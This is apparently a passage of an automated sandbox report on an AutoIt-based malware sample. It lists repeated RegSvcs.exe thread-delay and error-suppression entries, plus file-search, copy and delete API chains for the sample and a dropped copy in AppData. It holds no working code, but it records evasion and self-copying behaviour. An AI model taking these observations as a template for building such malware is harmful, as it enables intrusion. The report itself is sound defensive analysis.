Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599764 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599656 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599546 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599436 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599327 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599218 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599109 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598995 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598890 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598780 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598671 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598562 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598452 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598343 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598234 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598123 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598014 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597883 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597647 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597515 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597401 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597294 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597162 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597031 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596921 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596812 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596703 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596592 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596483 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596374 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596264 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596154 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596044 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595926 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595797 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595687 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595578 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595468 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595358 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595249 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595029 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594453 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594270 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594028 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593872 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593765 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593638 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 593531 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599765 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599656 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599546 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599437 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599328 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599218 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599108 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598999 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598890 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598780 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598671 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598562 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598453 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598343 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598234 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598124 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598015 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597906 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597796 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597687 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597578 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597467 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597359 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597250 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597140 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597031 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596921 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596812 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596702 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596540 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596436 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596327 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596213 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596107 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595998 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595885 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595781 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595661 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595510 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595406 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595296 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595187 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595078 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594967 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594859 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594750 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594640 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594531 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 594421 |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, |
0_2_00452492 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00442886 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, |
0_2_004788BD |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, |
0_2_004339B6 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, |
0_2_0045CAFA |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
0_2_00431A86 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, |
0_2_0044BD27 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0045DE8F FindFirstFileW,FindClose, |
0_2_0045DE8F |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, |
0_2_0044BF8B |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, |
6_2_00452492 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
6_2_00442886 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, |
6_2_004788BD |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, |
6_2_004339B6 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, |
6_2_0045CAFA |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, |
6_2_00431A86 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, |
6_2_0044BD27 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0045DE8F FindFirstFileW,FindClose, |
6_2_0045DE8F |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, |
6_2_0044BF8B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 600000 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599875 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599764 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599656 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599546 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599436 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599327 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599218 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 599109 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598995 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598890 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598780 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598671 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598562 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598452 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598343 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598234 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598123 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 598014 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597883 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597647 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597515 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597401 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597294 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597162 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 597031 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596921 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596812 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596703 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596592 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596483 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596374 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596264 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596154 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 596044 |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Thread delayed: delay time: 595926 |
